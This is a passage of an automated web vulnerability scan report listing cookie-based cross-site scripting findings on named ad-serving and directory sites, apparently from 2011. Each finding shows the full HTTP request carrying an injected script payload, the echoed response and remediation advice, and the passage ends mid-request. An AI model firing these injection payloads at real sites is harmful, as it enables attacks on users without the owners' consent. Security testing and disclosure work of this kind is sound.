Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6348/9844/15925-15.js?cb=0.7626287858001888&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=3;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=24732"-alert(1)-"bc24b459e39; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:03 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:46:03 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:46:03 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^71; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69236; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3162105.js^3^1315313163^1315313163&3142788.js^3^1315313162^1315313163&3147284.js^2^1315313162^1315313162&3142737.js^1^1315313161^1315313161&3172566.js^2^1315313155^1315313160&638177.js^10^1315313155^1315313155&3218925.js^1^1315313155^1315313155; expires=Tue, 13-Sep-2011 12:46:03 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2363

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3162105"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=24732"-alert(1)-"bc24b459e39\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.127. http://optimized-by.rubiconproject.com/a/6348/9844/15925-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/15925-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 565cb"-alert(1)-"ba9a296a288 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6348/9844/15925-2.js?cb=0.8956789178773761&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=4;sz=728x90;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=565cb"-alert(1)-"ba9a296a288; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^1; csi2=638178.js^1^1315313134^1315313134&3172565.js^1^1315313133^1315313133; rdk=6348/9844; rdk15=0; ses15=9844^2; csi15=638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:51:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:51:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 13:51:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^21; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=68937; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3162106.js^2^1315313462^1315313462&3142787.js^3^1315313461^1315313462&3142736.js^5^1315313454^1315313460&3147282.js^2^1315313454^1315313454&638178.js^5^1315313134^1315313454&3218923.js^1^1315313454^1315313454&3172565.js^2^1315313133^1315313454; expires=Tue, 13-Sep-2011 12:51:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2361

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3162106"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=565cb"-alert(1)-"ba9a296a288\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.128. http://optimized-by.rubiconproject.com/a/6348/9844/16043-15.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-15.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c6b4"-alert(1)-"6a907558510 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6348/9844/16043-15.js?cb=0.7354257416445762&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; ruid=9c6b4"-alert(1)-"6a907558510; csi15=3215715.js^1^1315103145^1315103145&3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:46:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 13:46:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^67; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69237; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3142788.js^2^1315313162^1315313162&3147284.js^2^1315313162^1315313162&3142737.js^1^1315313161^1315313161&3172566.js^2^1315313155^1315313160&638177.js^10^1315313155^1315313155&3218925.js^1^1315313155^1315313155; expires=Tue, 13-Sep-2011 12:46:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1954

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3142788"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=9c6b4"-alert(1)-"6a907558510\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.129. http://optimized-by.rubiconproject.com/a/6348/9844/16043-2.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/6348/9844/16043-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e29a"-alert(1)-"49c08fab665 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/6348/9844/16043-2.js?cb=0.6071016045752913&keyword=ober.frontier HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=4;sz=728x90;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=8e29a"-alert(1)-"49c08fab665; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6348/9844; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:46:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=35; expires=Tue, 06-Sep-2011 13:46:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^43; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69234; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1691

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3201722"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=8e29a"-alert(1)-"49c08fab665\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.130. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54184"-alert(1)-"624e25b3d18 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/dk.js?defaulting_ad=x3068d5.js&size_id=2&account_id=6348&site_id=9844&size=728x90&cb=0.8285465578082949 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=54184"-alert(1)-"624e25b3d18; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk15=0; ses15=9844^1; csi15=638177.js^1^1315313132^1315313132; rdk=6348/9844; rdk2=0; ses2=9844^1; csi2=3172565.js^1^1315313133^1315313133

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:07 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6348/9844; expires=Tue, 06-Sep-2011 13:46:07 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=18; expires=Tue, 06-Sep-2011 13:46:07 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^1ca0eaaac19d1eb65fb2a3086; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=69232; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1687

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3201722"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=54184"-alert(1)-"624e25b3d18\" style=\"display: none;\" border=\"0\" height=\"1\" width=\"1\" alt=\"\"/>
...[SNIP]...

2.131. http://utdi.reachlocal.net/index.html [RlocalUID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The value of the RlocalUID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fd63"><script>alert(1)</script>9174be4056b was submitted in the RlocalUID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.html?scid=2323693&cid=e78be HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=e78be%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3E08a96ad64a0&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Cookie: RlocalUID=tc%3D110906050952308467fd63"><script>alert(1)</script>9174be4056b; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:10:39 GMT
Server: ConcentricHost-Ashurbanipal/2.0 (Concentric(R))
X-RL-Host: pweb101
X-Robots-Tag: noindex,nofollow
Last-Modified: Wed, 31 Aug 2011 22:29:49 GMT
ETag: "15f966a-5607-4e5eb5dd"
Accept-Ranges: bytes
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 22698
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:32 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><meta name="robots" content="noindex,nofollow" />
<meta http-equiv="Content-Type" co
...[SNIP]...
<a href="http://rtsys.rtrk.com/coupon/?scid=2323683&cid=837045&tc=110906050952308467fd63"><script>alert(1)</script>9174be4056b&ptt=4&target_email=kheckaman@utdi.com" TARGET="RL_top">
...[SNIP]...

2.132. http://www.frontierpages.com/ [FrontierPages cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /

Issue detail

The value of the FrontierPages cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6394a"><script>alert(1)</script>5a4e9c709b5 was submitted in the FrontierPages cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallas6394a"><script>alert(1)</script>5a4e9c709b5

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 19014
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:43:09 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/favic
...[SNIP]...
<a href="http://yp.frontierpages.com/results.aspx?term=Government+Offices&city=Dallas6394a"><script>alert(1)</script>5a4e9c709b5&state=TX&Pagenumber=1&Termsearch=true&Partnerid=BRY-01&Portal=Frontier">
...[SNIP]...

2.133. http://www.frontierpages.com/ [FrontierPages cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /

Issue detail

The value of the FrontierPages cookie is copied into an HTML comment. The payload 1c7d1--><script>alert(1)</script>28ca95d684b was submitted in the FrontierPages cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET / HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallas1c7d1--><script>alert(1)</script>28ca95d684b

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 19016
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:43:14 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/favic
...[SNIP]...
<a href="http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp?city=Dallas1c7d1--><script>alert(1)</script>28ca95d684b&state=TX&Pagenumber=1&Termsearch=true&Partnerid=BRY-01&Portal=Frontier">
...[SNIP]...

2.134. http://www.frontierpages.com/region.asp [FrontierPages cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /region.asp

Issue detail

The value of the FrontierPages cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbf27"><script>alert(1)</script>cc197d9f09f was submitted in the FrontierPages cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /region.asp HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da91f0CMYKK; ASPSESSIONIDQSADQARA=OMKNBNPCLDMMJEBJGLGBFINK; ASP.NET_SessionId=tywqtg45vh52uj45zwyuwq55; FrontierPages=uState=TX&uCity=Dallascbf27"><script>alert(1)</script>cc197d9f09f

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:46:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 19014
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:45:37 GMT
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="/favic
...[SNIP]...
<a href="http://yp.frontierpages.com/results.aspx?term=Government+Offices&city=Dallascbf27"><script>alert(1)</script>cc197d9f09f&state=TX&Pagenumber=1&Termsearch=true&Partnerid=BRY-01&Portal=Frontier">
...[SNIP]...

2.135. http://www.frontierpages.com/region.asp [FrontierPages cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierpages.com
Path:   /region.asp

Issue detail

The value of the FrontierPages cookie is copied into an HTML comment. The payload 8b18d--><script>alert(1)</script>394a50af88d was submitted in the FrontierPages cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /region.asp HTTP/1.1
Host: www.frontierpages.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
